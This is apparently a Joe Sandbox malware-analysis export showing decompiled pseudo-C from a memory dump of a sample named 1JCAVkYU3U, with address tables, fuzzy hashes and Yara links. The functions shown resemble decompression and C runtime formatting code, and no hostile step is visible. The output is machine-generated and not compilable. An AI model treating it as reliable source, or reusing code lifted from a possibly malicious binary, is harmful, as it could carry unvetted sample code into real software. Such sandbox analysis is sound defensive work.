0x00b7417b
0x00b7417d
0x00000000
0x00b7417d
0x00b74163
0x00b74184
0x00b74184
0x00b74185
0x00b74185
0x00b7418a
0x00b7418c
0x00b74194
0x00b74199
0x00b7419a
0x00b7419f
0x00b7419f
0x00b741a1
0x00b741aa
0x00b741ac
0x00b741bd
0x00b741bf
0x00b741c6
0x00b741cc
0x00b741d2
0x00b741d6
0x00b74203
0x00b74204
0x00b74205
0x00b74209
0x00b7420b
0x00b74229
0x00b7422c
0x00b74238
0x00b7423a
0x00b7423e
0x00b74243
0x00b74250
0x00b74252
0x00b74255
0x00b74257
0x00b74257
0x00b74259
0x00b74261
0x00b74263
0x00b74264
0x00b74267
0x00b74280
0x00b74281
0x00b74284
0x00b742d2
0x00b742d4
0x00b742f1
0x00b742f1
0x00b742f4
0x00b742d6
0x00b742e0
0x00b742e3
0x00b742e3
0x00b742f6
0x00b742fa
0x00b742ff
0x00b742ff
0x00b74300
0x00b74306
0x00000000
0x00000000
0x00b74308
0x00b7430d
0x00b7430e
0x00b74310
0x00000000
0x00000000
0x00b74312
0x00b74312
0x00000000
0x00b74312
0x00000000
0x00b742ff
0x00b74286
0x00b74289
0x00b7428b
0x00b742a8
0x00b742a8
0x00b742ab
0x00b7428d
0x00b74297
0x00b7429a
0x00b7429a
0x00b742ad
0x00b742b1
0x00b742b6
0x00b742b8
0x00000000
0x00b742ba
0x00b742ba
0x00b742ba
0x00b742bb
0x00b742c1
0x00000000
0x00000000
0x00b742c7
0x00b742cb
0x00b742cc
0x00b742ce
0x00000000
0x00000000
0x00000000
0x00b742d0
0x00000000
0x00b742ba
0x00b742b8
0x00b74274
0x00b74278
0x00000000
0x00b74278
0x00b74214
0x00b74214
0x00b74216
0x00b74216
0x00b74218
0x00000000
0x00000000
0x00b7421a
0x00b7421b
0x00b7421e
0x00b74221
0x00000000
0x00000000
0x00000000
0x00b74223
0x00b74225
0x00000000
0x00b74225
0x00b741da
0x00b741dd
0x00b741e7
0x00b741ef
0x00b741f4
0x00b741f7
0x00000000
0x00b741f7
0x00b741b0
0x00b741b5
0x00b741b7
0x00000000
0x00000000
0x00000000
0x00b74318
0x00b74318
0x00b74318
0x00b74324
0x00b74326
0x00b7432d
0x00b74333
0x00b74339
0x00b74346
0x00b7434b
0x00b7434c
0x00b74351
0x00b7435b
0x00b74363
0x00b74364
0x00b74369
0x00b74373
0x00b7437b
0x00b7437c
0x00b74381
0x00b7438b
0x00b74393
0x00b74394
0x00b743aa
0x00000000
0x00b743b2
0x00000000
0x00b74333
0x00b740d5
0x00000000
0x00b74335
0x00b74335
0x00000000
0x00b74335

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
Instruction ID: 6f1f7f9b2f67c6c9fef45af6f6ef54a83ad2235a7b12e61038fb5d5205754d83
Opcode Fuzzy Hash: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
Instruction Fuzzy Hash: 379167B02003498BDB28EF64D8D0BBE77D5EB50301F5089ADF6BE97282DB749945C752

Uniqueness

Uniqueness Score: -1.00%

Function 00B743BF Relevance: .2, Instructions: 243
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E00B743BF(void* __ecx) {
				signed int _t70;
				signed int _t71;
				signed int _t72;
				signed int _t75;
				signed int _t76;
				signed int _t77;
				void* _t79;
				char _t90;
				signed int _t94;
				void* _t97;
				signed int _t108;
				unsigned int _t112;
				intOrPtr* _t114;
				signed int _t117;
				intOrPtr _t118;
				signed int _t124;
				signed int _t127;
				signed int _t128;
				signed int _t134;
				signed int _t136;
				void* _t138;
				signed int _t141;
				void* _t142;
				intOrPtr* _t143;
				void* _t147;
				intOrPtr* _t153;
				intOrPtr* _t156;
				void* _t157;
				signed int _t160;
				unsigned int _t165;
				void* _t168;
				signed int _t169;
				signed int _t171;
				signed int _t172;
				intOrPtr* _t175;
				void* _t177;
				void* _t178;

				_t177 = __ecx;
				if( *((char*)( *((intOrPtr*)(_t178 + 8)) + 0x11)) != 0) {
					_t175 =  *((intOrPtr*)(_t178 + 0x1dc));
					__eflags =  *((char*)(_t175 + 8));
					if( *((char*)(_t175 + 8)) != 0) {
						L5:
						_t171 = 0;
						__eflags = 0;
						do {
							_t112 = E00B6A898(_t175) >> 0xc;
							E00B6A881(_t175, 4);
							__eflags = _t112 - 0xf;
							if(_t112 != 0xf) {
								 *(_t178 + _t171 + 0x18) = _t112;
								goto L14;
							}
							_t127 = E00B6A898(_t175) >> 0x0000000c & 0x000000ff;
							E00B6A881(_t175, 4);
							__eflags = _t127;
							if(_t127 != 0) {
								_t128 = _t127 + 2;
								__eflags = _t128;
								while(1) {
									_t128 = _t128 - 1;
									__eflags = _t171 - 0x14;
									if(_t171 >= 0x14) {
										break;
									}
									 *(_t178 + _t171 + 0x18) = 0;
									_t171 = _t171 + 1;
									__eflags = _t128;
									if(_t128 != 0) {
										continue;
									}
									break;
								}
								_t171 = _t171 - 1;
								goto L14;
							}
							 *(_t178 + _t171 + 0x18) = 0xf;
							L14:
							_t171 = _t171 + 1;
							__eflags = _t171 - 0x14;
						} while (_t171 < 0x14);
						_push(0x14);
						_t114 =  *((intOrPtr*)(_t178 + 0x1e8)) + 0x3bb0;
						_push(_t114);
						_push(_t178 + 0x18);
						 *((intOrPtr*)(_t178 + 0x20)) = _t114;
						E00B73797();
						_t172 = 0;
						__eflags = 0;
						do {
							__eflags =  *((char*)(_t175 + 8));
							if( *((char*)(_t175 + 8)) != 0) {
								L19:
								_t70 = E00B6A89D(_t175);
								_t71 =  *(_t114 + 0x84);
								_t165 = _t70 & 0x0000fffe;
								__eflags = _t165 -  *((intOrPtr*)(_t114 + 4 + _t71 * 4));
								if(_t165 >=  *((intOrPtr*)(_t114 + 4 + _t71 * 4))) {
									_t134 = 0xf;
									_t72 = _t71 + 1;
									 *(_t178 + 0x10) = _t134;
									__eflags = _t72 - _t134;
									if(_t72 >= _t134) {
										L27:
										_t136 =  *(_t175 + 4) +  *(_t178 + 0x10);
										 *_t175 =  *_t175 + (_t136 >> 3);
										_t75 =  *(_t178 + 0x10);
										 *(_t175 + 4) = _t136 & 0x00000007;
										_t138 = 0x10;
										_t141 =  *((intOrPtr*)(_t114 + 0x44 + _t75 * 4)) + (_t165 -  *((intOrPtr*)(_t114 + _t75 * 4)) >> _t138 - _t75);
										__eflags = _t141 -  *_t114;
										asm("sbb eax, eax");
										_t76 = _t75 & _t141;
										__eflags = _t76;
										_t77 =  *(_t114 + 0xc88 + _t76 * 2) & 0x0000ffff;
										L28:
										_t142 = 0x10;
										__eflags = _t77 - _t142;
										if(_t77 >= _t142) {
											_t168 = 0x12;
											__eflags = _t77 - _t168;
											if(__eflags >= 0) {
												_t143 = _t175;
												if(__eflags != 0) {
													_t117 = (E00B6A898(_t143) >> 9) + 0xb;
													__eflags = _t117;
													_push(7);
												} else {
													_t117 = (E00B6A898(_t143) >> 0xd) + 3;
													_push(3);
												}
												_pop(_t79);
												E00B6A881(_t175, _t79);
												while(1) {
													_t117 = _t117 - 1;
													__eflags = _t172 - 0x1ae;
													if(_t172 >= 0x1ae) {
														goto L46;
													}
													 *(_t178 + _t172 + 0x2c) = 0;
													_t172 = _t172 + 1;
													__eflags = _t117;
													if(_t117 != 0) {
														continue;
													}
													L44:
													_t114 =  *((intOrPtr*)(_t178 + 0x14));
													goto L45;
												}
												break;
											}
											__eflags = _t77 - _t142;
											_t153 = _t175;
											if(_t77 != _t142) {
												_t124 = (E00B6A898(_t153) >> 9) + 0xb;
												__eflags = _t124;
												_push(7);
											} else {
												_t124 = (E00B6A898(_t153) >> 0xd) + 3;
												_push(3);
											}
											_pop(_t97);
											E00B6A881(_t175, _t97);
											__eflags = _t172;
											if(_t172 == 0) {
												L48:
												_t90 = 0;
												L50:
												return _t90;
											} else {
												while(1) {
													_t124 = _t124 - 1;
													__eflags = _t172 - 0x1ae;
													if(_t172 >= 0x1ae) {
														goto L46;
													}
													 *(_t178 + _t172 + 0x2c) =  *((intOrPtr*)(_t178 + _t172 + 0x2b));
													_t172 = _t172 + 1;
													__eflags = _t124;
													if(_t124 != 0) {
														continue;
													}
													goto L44;
												}
												break;
											}
										}
										 *(_t178 + _t172 + 0x2c) = _t77;
										_t172 = _t172 + 1;
										goto L45;
									}
									_t156 = _t114 + (_t72 + 1) * 4;
									while(1) {
										__eflags = _t165 -  *_t156;
										if(_t165 <  *_t156) {
											break;
										}
										_t72 = _t72 + 1;
										_t156 = _t156 + 4;
										__eflags = _t72 - 0xf;
										if(_t72 < 0xf) {
											continue;
										}
										goto L27;
									}
									 *(_t178 + 0x10) = _t72;
									goto L27;
								}
								_t157 = 0x10;
								_t169 = _t165 >> _t157 - _t71;
								_t160 = ( *(_t169 + _t114 + 0x88) & 0x000000ff) +  *(_t175 + 4);
								 *_t175 =  *_t175 + (_t160 >> 3);
								 *(_t175 + 4) = _t160 & 0x00000007;
								_t77 =  *(_t114 + 0x488 + _t169 * 2) & 0x0000ffff;
								goto L28;
							}
							__eflags =  *_t175 -  *((intOrPtr*)(_t177 + 0x84)) - 5;
							if( *_t175 <=  *((intOrPtr*)(_t177 + 0x84)) - 5) {
								goto L19;
							}
							_t94 = E00B74E52(_t177);
							__eflags = _t94;
							if(_t94 == 0) {
								goto L48;
							}
							goto L19;
							L45:
							__eflags = _t172 - 0x1ae;
						} while (_t172 < 0x1ae);
						L46:
						 *((char*)(_t177 + 0xe662)) = 1;
						__eflags =  *((char*)(_t175 + 8));
						if( *((char*)(_t175 + 8)) != 0) {
							L49:
							_t118 =  *((intOrPtr*)(_t178 + 0x1e8));
							_push(0x132);
							_push(_t118);
							_push(_t178 + 0x2c);
							E00B73797();
							_push(0x40);
							_push(_t118 + 0xeec);
							_push(_t178 + 0x166);
							E00B73797();
							_t147 = 0x10;
							_push(_t147);
							_push(_t118 + 0x1dd8);
							_push(_t178 + 0x1a6);
							E00B73797();
							_push(0x2c);
							_push(_t118 + 0x2cc4);
							_push(_t178 + 0x1b6);
							E00B73797();
							_t90 = 1;
							goto L50;
						}
						__eflags =  *_t175 -  *((intOrPtr*)(_t177 + 0x84));
						if( *_t175 <=  *((intOrPtr*)(_t177 + 0x84))) {
							goto L49;
						}
						goto L48;
					}
					__eflags =  *_t175 -  *((intOrPtr*)(__ecx + 0x84)) - 0x19;
					if( *_t175 <=  *((intOrPtr*)(__ecx + 0x84)) - 0x19) {
						goto L5;
					}
					_t108 = E00B74E52(__ecx);
					__eflags = _t108;
					if(_t108 == 0) {
						goto L48;
					}
					goto L5;
				}
				return 1;
			}

0x00b743ce
0x00b743d0
0x00b743db
0x00b743e3
0x00b743e7
0x00b74403
0x00b74403
0x00b74403
0x00b74405
0x00b74412
0x00b74415
0x00b7441a
0x00b7441d
0x00b74456
0x00000000
0x00b74456
0x00b7442d
0x00b74430
0x00b74435
0x00b74437
0x00b74440
0x00b74440
0x00b74443
0x00b74443
0x00b74444
0x00b74447
0x00000000
0x00000000
0x00b74449
0x00b7444e
0x00b7444f
0x00b74451
0x00000000
0x00000000
0x00000000
0x00b74451
0x00b74453
0x00000000
0x00b74453
0x00b74439
0x00b7445a
0x00b7445a
0x00b7445b
0x00b7445b
0x00b7446b
0x00b7446d
0x00b74475
0x00b74476
0x00b74477
0x00b7447b
0x00b74480
0x00b74480
0x00b74482
0x00b74482
0x00b74486
0x00b744a4
0x00b744a6
0x00b744ad
0x00b744b3
0x00b744b9
0x00b744bd
0x00b744ea
0x00b744eb
0x00b744ec
0x00b744f0
0x00b744f2
0x00b7450d
0x00b74510
0x00b7451c
0x00b7451e
0x00b74522
0x00b74527
0x00b74533
0x00b74535
0x00b74537
0x00b74539
0x00b74539
0x00b7453b
0x00b74543
0x00b74545
0x00b74546
0x00b74549
0x00b74557
0x00b74558
0x00b7455b
0x00b745a9
0x00b745ab
0x00b745c8
0x00b745c8
0x00b745cb
0x00b745ad
0x00b745b7
0x00b745ba
0x00b745ba
0x00b745cd
0x00b745d1
0x00b745d6
0x00b745d6
0x00b745d7
0x00b745dd
0x00000000
0x00000000
0x00b745df
0x00b745e4
0x00b745e5
0x00b745e7
0x00000000
0x00000000
0x00b745e9
0x00b745e9
0x00000000
0x00b745e9
0x00000000
0x00b745d6
0x00b7455d
0x00b74560
0x00b74562
0x00b7457f
0x00b7457f
0x00b74582
0x00b74564
0x00b7456e
0x00b74571
0x00b74571
0x00b74584
0x00b74588
0x00b7458d
0x00b7458f
0x00b74610
0x00b74610
0x00b74679
0x00000000
0x00b74591
0x00b74591
0x00b74591
0x00b74592
0x00b74598
0x00000000
0x00000000
0x00b7459e
0x00b745a2
0x00b745a3
0x00b745a5
0x00000000
0x00000000
0x00000000
0x00b745a7
0x00000000
0x00b74591
0x00b7458f
0x00b7454b
0x00b7454f
0x00000000
0x00b7454f
0x00b744f7
0x00b744fa
0x00b744fa
0x00b744fc
0x00000000
0x00000000
0x00b744fe
0x00b744ff
0x00b74502
0x00b74505
0x00000000
0x00000000
0x00000000
0x00b74507
0x00b74509
0x00000000
0x00b74509
0x00b744c1
0x00b744c4
0x00b744ce
0x00b744d6
0x00b744db
0x00b744de
0x00000000
0x00b744de
0x00b74491
0x00b74493
0x00000000
0x00000000
0x00b74497
0x00b7449c
0x00b7449e
0x00000000
0x00000000
0x00000000
0x00b745ed
0x00b745ed
0x00b745ed
0x00b745f9
0x00b745f9
0x00b74600
0x00b74604
0x00b74614
0x00b74614
0x00b7461f
0x00b74624
0x00b74625
0x00b74628
0x00b7462d
0x00b74637
0x00b7463f
0x00b74640
0x00b74647
0x00b74648
0x00b74651
0x00b74659
0x00b7465a
0x00b7465f
0x00b74667
0x00b7466f
0x00b74672
0x00b74677
0x00000000
0x00b74677
0x00b74608
0x00b7460e
0x00000000
0x00000000
0x00000000
0x00b7460e
0x00b743f2
0x00b743f4
0x00000000
0x00000000
0x00b743f6
0x00b743fb
0x00b743fd
0x00000000
0x00000000
0x00000000
0x00b743fd
0x00000000

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction ID: a1eb65c4285ce4c3d7a895fd9219319e5dddc466c75642c27d4bc9dbb1fcfe95
Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction Fuzzy Hash: 898139713043464FDF24DE68C8D1BBD77D4EBA1305F0089ADEAAE8B282DF7489859752

Uniqueness

Uniqueness Score: -1.00%

Function 00B851C9 Relevance: .2, Instructions: 237
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 84%

			E00B851C9(void* __ecx, void* __edi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __esi;
				signed int _t52;
				signed int _t54;
				signed int _t55;
				void* _t56;
				signed int _t57;
				signed char _t60;
				signed char _t62;
				signed int _t64;
				void* _t65;
				signed int _t66;
				signed char _t75;
				signed char _t78;
				void* _t86;
				void* _t88;
				signed char _t90;
				signed char _t92;
				signed int _t93;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t101;
				void* _t103;
				signed int _t109;
				unsigned int _t111;
				signed char _t113;
				unsigned int _t121;
				void* _t122;
				signed int _t123;
				short _t124;
				void* _t127;
				void* _t128;
				void* _t129;
				signed int _t130;
				void* _t131;
				void* _t133;
				void* _t134;

				_t122 = __edi;
				_t52 =  *0xb9e7ac; // 0x37e7c6f
				_v8 = _t52 ^ _t130;
				_t129 = __ecx;
				_t101 = 0;
				_t121 = 0x41;
				_t54 =  *(__ecx + 0x32) & 0x0000ffff;
				_t103 = 0x58;
				_t133 = _t54 - 0x64;
				if(_t133 > 0) {
					__eflags = _t54 - 0x70;
					if(__eflags > 0) {
						_t55 = _t54 - 0x73;
						__eflags = _t55;
						if(_t55 == 0) {
							L9:
							_t56 = E00B85BFB(_t129);
							L10:
							if(_t56 != 0) {
								__eflags =  *((intOrPtr*)(_t129 + 0x30)) - _t101;
								if( *((intOrPtr*)(_t129 + 0x30)) != _t101) {
									L71:
									_t57 = 1;
									L72:
									return E00B7FBBC(_t57, _t101, _v8 ^ _t130, _t121, _t122, _t129);
								}
								_t121 =  *(_t129 + 0x20);
								_push(_t122);
								_v16 = _t101;
								_t60 = _t121 >> 4;
								_v12 = _t101;
								_t123 = 0x20;
								__eflags = 1 & _t60;
								if((1 & _t60) == 0) {
									L46:
									_t109 =  *(_t129 + 0x32) & 0x0000ffff;
									__eflags = _t109 - 0x78;
									if(_t109 == 0x78) {
										L48:
										_t62 = _t121 >> 5;
										__eflags = _t62 & 0x00000001;
										if((_t62 & 0x00000001) == 0) {
											L50:
											__eflags = 0;
											L51:
											__eflags = _t109 - 0x61;
											if(_t109 == 0x61) {
												L54:
												_t64 = 1;
												L55:
												_t124 = 0x30;
												__eflags = _t64;
												if(_t64 != 0) {
													L57:
													_t65 = 0x58;
													 *((short*)(_t130 + _t101 * 2 - 0xc)) = _t124;
													__eflags = _t109 - _t65;
													if(_t109 == _t65) {
														L60:
														_t66 = 1;
														L61:
														__eflags = _t66;
														asm("cbw");
														 *((short*)(_t130 + _t101 * 2 - 0xa)) = ((_t66 & 0xffffff00 | _t66 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
														_t101 = _t101 + 2;
														__eflags = _t101;
														L62:
														_t127 =  *((intOrPtr*)(_t129 + 0x24)) -  *((intOrPtr*)(_t129 + 0x38)) - _t101;
														__eflags = _t121 & 0x0000000c;
														if((_t121 & 0x0000000c) == 0) {
															E00B84490(_t129 + 0x448, 0x20, _t127, _t129 + 0x18);
															_t131 = _t131 + 0x10;
														}
														E00B85F16(_t129 + 0x448,  &_v16, _t101, _t129 + 0x18,  *((intOrPtr*)(_t129 + 0xc)));
														_t111 =  *(_t129 + 0x20);
														_t101 = _t129 + 0x18;
														_t75 = _t111 >> 3;
														__eflags = _t75 & 0x00000001;
														if((_t75 & 0x00000001) != 0) {
															_t113 = _t111 >> 2;
															__eflags = _t113 & 0x00000001;
															if((_t113 & 0x00000001) == 0) {
																E00B84490(_t129 + 0x448, 0x30, _t127, _t101);
																_t131 = _t131 + 0x10;
															}
														}
														E00B85DF8(_t129, 0);
														__eflags =  *_t101;
														if( *_t101 >= 0) {
															_t78 =  *(_t129 + 0x20) >> 2;
															__eflags = _t78 & 0x00000001;
															if((_t78 & 0x00000001) != 0) {
																E00B84490(_t129 + 0x448, 0x20, _t127, _t101);
															}
														}
														_pop(_t122);
														goto L71;
													}
													_t86 = 0x41;
													__eflags = _t109 - _t86;
													if(_t109 == _t86) {
														goto L60;
													}
													_t66 = 0;
													goto L61;
												}
												__eflags = _t64;
												if(_t64 == 0) {
													goto L62;
												}
												goto L57;
											}
											_t128 = 0x41;
											__eflags = _t109 - _t128;
											if(_t109 == _t128) {
												goto L54;
											}
											_t64 = 0;
											goto L55;
										}
										goto L51;
									}
									_t88 = 0x58;
									__eflags = _t109 - _t88;
									if(_t109 != _t88) {
										goto L50;
									}
									goto L48;
								}
								_t90 = _t121 >> 6;
								__eflags = 1 & _t90;
								if((1 & _t90) == 0) {
									__eflags = 1 & _t121;
									if((1 & _t121) == 0) {
										_t92 = _t121 >> 1;
										__eflags = 1 & _t92;
										if((1 & _t92) == 0) {
											goto L46;
										}
										_v16 = _t123;
										L45:
										_t101 = 1;
										goto L46;
									}
									_push(0x2b);
									L40:
									_pop(_t93);
									_v16 = _t93;
									goto L45;
								}
								_push(0x2d);
								goto L40;
							}
							L11:
							_t57 = 0;
							goto L72;
						}
						_t95 = _t55;
						__eflags = _t95;
						if(__eflags == 0) {
							L28:
							_push(_t101);
							_push(0xa);
							L29:
							_t56 = E00B85993(_t129, _t122, __eflags);
							goto L10;
						}
						__eflags = _t95 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t56 = E00B85B70(__ecx);
						goto L10;
					}
					__eflags = _t54 - 0x67;
					if(_t54 <= 0x67) {
						L30:
						_t56 = E00B856F9(_t101, _t129);
						goto L10;
					}
					__eflags = _t54 - 0x69;
					if(_t54 == 0x69) {
						L27:
						_t3 = _t129 + 0x20;
						 *_t3 =  *(_t129 + 0x20) | 0x00000010;
						__eflags =  *_t3;
						goto L28;
					}
					__eflags = _t54 - 0x6e;
					if(_t54 == 0x6e) {
						_t56 = E00B85ADD(__ecx, _t121);
						goto L10;
					}
					__eflags = _t54 - 0x6f;
					if(_t54 != 0x6f) {
						goto L11;
					}
					_t56 = E00B85B51(__ecx);
					goto L10;
				}
				if(_t133 == 0) {
					goto L27;
				}
				_t134 = _t54 - _t103;
				if(_t134 > 0) {
					_t97 = _t54 - 0x5a;
					__eflags = _t97;
					if(_t97 == 0) {
						_t56 = E00B8553C(__ecx);
						goto L10;
					}
					_t98 = _t97 - 7;
					__eflags = _t98;
					if(_t98 == 0) {
						goto L30;
					}
					__eflags = _t98;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t56 = E00B858FB(_t129, __eflags, _t101);
					goto L10;
				}
				if(_t134 == 0) {
					_push(1);
					goto L13;
				}
				if(_t54 == _t121) {
					goto L30;
				}
				if(_t54 == 0x43) {
					goto L17;
				}
				if(_t54 <= 0x44) {
					goto L11;
				}
				if(_t54 <= 0x47) {
					goto L30;
				}
				if(_t54 != 0x53) {
					goto L11;
				}
				goto L9;
			}

0x00b851c9
0x00b851d1
0x00b851d8
0x00b851dd
0x00b851df
0x00b851e3
0x00b851e6
0x00b851ea
0x00b851eb
0x00b851ee
0x00b8525b
0x00b8525e
0x00b852ad
0x00b852ad
0x00b852b0
0x00b8521c
0x00b8521e
0x00b85223
0x00b85225
0x00b852cb
0x00b852ce
0x00b85414
0x00b85414
0x00b85416
0x00b85425
0x00b85425
0x00b852d4
0x00b852d9
0x00b852dc
0x00b852df
0x00b852e3
0x00b852e9
0x00b852ea
0x00b852ec
0x00b85316
0x00b85316
0x00b8531a
0x00b8531d
0x00b85327
0x00b85329
0x00b8532c
0x00b8532e
0x00b85334
0x00b85334
0x00b85336
0x00b85336
0x00b85339
0x00b85347
0x00b85347
0x00b85349
0x00b8534b
0x00b8534c
0x00b8534e
0x00b85354
0x00b85356
0x00b85357
0x00b8535c
0x00b8535f
0x00b8536d
0x00b8536d
0x00b8536f
0x00b8536f
0x00b8537a
0x00b8537c
0x00b85381
0x00b85381
0x00b85384
0x00b8538a
0x00b8538c
0x00b8538f
0x00b8539f
0x00b853a4
0x00b853a4
0x00b853b9
0x00b853be
0x00b853c1
0x00b853c6
0x00b853c9
0x00b853cb
0x00b853cd
0x00b853d0
0x00b853d3
0x00b853e0
0x00b853e5
0x00b853e5
0x00b853d3
0x00b853ec
0x00b853f1
0x00b853f4
0x00b853f9
0x00b853fc
0x00b853fe
0x00b8540b
0x00b85410
0x00b853fe
0x00b85413
0x00000000
0x00b85413
0x00b85363
0x00b85364
0x00b85367
0x00000000
0x00000000
0x00b85369
0x00000000
0x00b85369
0x00b85350
0x00b85352
0x00000000
0x00000000
0x00000000
0x00b85352
0x00b8533d
0x00b8533e
0x00b85341
0x00000000
0x00000000
0x00b85343
0x00000000
0x00b85343
0x00000000
0x00b85330
0x00b85321
0x00b85322
0x00b85325
0x00000000
0x00000000
0x00000000
0x00b85325
0x00b852f0
0x00b852f3
0x00b852f5
0x00b85300
0x00b85302
0x00b8530a
0x00b8530c
0x00b8530e
0x00000000
0x00000000
0x00b85310
0x00b85314
0x00b85314
0x00000000
0x00b85314
0x00b85304
0x00b852f9
0x00b852f9
0x00b852fa
0x00000000
0x00b852fa
0x00b852f7
0x00000000
0x00b852f7
0x00b8522b
0x00b8522b
0x00000000
0x00b8522b
0x00b852b7
0x00b852b7
0x00b852ba
0x00b8528c
0x00b8528c
0x00b8528d
0x00b8528f
0x00b85291
0x00000000
0x00b85291
0x00b852bc
0x00b852bf
0x00000000
0x00000000
0x00b852c5
0x00b85234
0x00b85234
0x00000000
0x00b85234
0x00b85260
0x00b852a3
0x00000000
0x00b852a3
0x00b85262
0x00b85265
0x00b85298
0x00b8529a
0x00000000
0x00b8529a
0x00b85267
0x00b8526a
0x00b85288
0x00b85288
0x00b85288
0x00b85288
0x00000000
0x00b85288
0x00b8526c
0x00b8526f
0x00b85281
0x00000000
0x00b85281
0x00b85271
0x00b85274
0x00000000
0x00000000
0x00b85278
0x00000000
0x00b85278
0x00b851f0
0x00000000
0x00000000
0x00b851f6
0x00b851f8
0x00b85238
0x00b85238
0x00b8523b
0x00b85254
0x00000000
0x00b85254
0x00b8523d
0x00b8523d
0x00b85240
0x00000000
0x00000000
0x00b85243
0x00b85246
0x00000000
0x00000000
0x00b85248
0x00b8524b
0x00000000
0x00b8524b
0x00b851fa
0x00b85232
0x00000000
0x00b85232
0x00b851fe
0x00000000
0x00000000
0x00b85207
0x00000000
0x00000000
0x00b8520c
0x00000000
0x00000000
0x00b85211
0x00000000
0x00000000
0x00b8521a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bd3efd9b05769f452948a43c813d0ef91d1350452eb533879934f0bbadc6f7f
Instruction ID: 7471ec52e84b92a04cab5e21eab817b3419fce85a81e8beac36ec7b54e89992c
Opcode Fuzzy Hash: 5bd3efd9b05769f452948a43c813d0ef91d1350452eb533879934f0bbadc6f7f
Instruction Fuzzy Hash: 0E617831640F0A57DA38BE68A8D6BFE63D4EB11340F5405DAE483DF2B1DA91DD42C719

Uniqueness

Uniqueness Score: -1.00%

Function 00B84F9A Relevance: .2, Instructions: 214
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 88%

			E00B84F9A(void* __ecx) {
				char _v6;
				char _v8;
				void* __ebx;
				void* __edi;
				char _t49;
				signed int _t50;
				void* _t51;
				signed char _t54;
				signed char _t56;
				signed int _t57;
				signed int _t58;
				signed char _t67;
				signed char _t69;
				signed char _t71;
				signed char _t80;
				signed char _t82;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed char _t92;
				void* _t95;
				intOrPtr _t100;
				unsigned int _t102;
				signed char _t104;
				void* _t112;
				unsigned int _t113;
				void* _t114;
				signed int _t115;
				signed int* _t116;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t124;
				void* _t125;

				_push(__ecx);
				_t119 = __ecx;
				_t92 = 1;
				_t49 =  *((char*)(__ecx + 0x31));
				_t124 = _t49 - 0x64;
				if(_t124 > 0) {
					__eflags = _t49 - 0x70;
					if(__eflags > 0) {
						_t50 = _t49 - 0x73;
						__eflags = _t50;
						if(_t50 == 0) {
							L9:
							_t51 = E00B85B88(_t119);
							L10:
							if(_t51 != 0) {
								__eflags =  *((char*)(_t119 + 0x30));
								if( *((char*)(_t119 + 0x30)) == 0) {
									_t113 =  *(_t119 + 0x20);
									_push(_t114);
									_v8 = 0;
									_t115 = 0;
									_v6 = 0;
									_t54 = _t113 >> 4;
									__eflags = _t92 & _t54;
									if((_t92 & _t54) == 0) {
										L46:
										_t100 =  *((intOrPtr*)(_t119 + 0x31));
										__eflags = _t100 - 0x78;
										if(_t100 == 0x78) {
											L48:
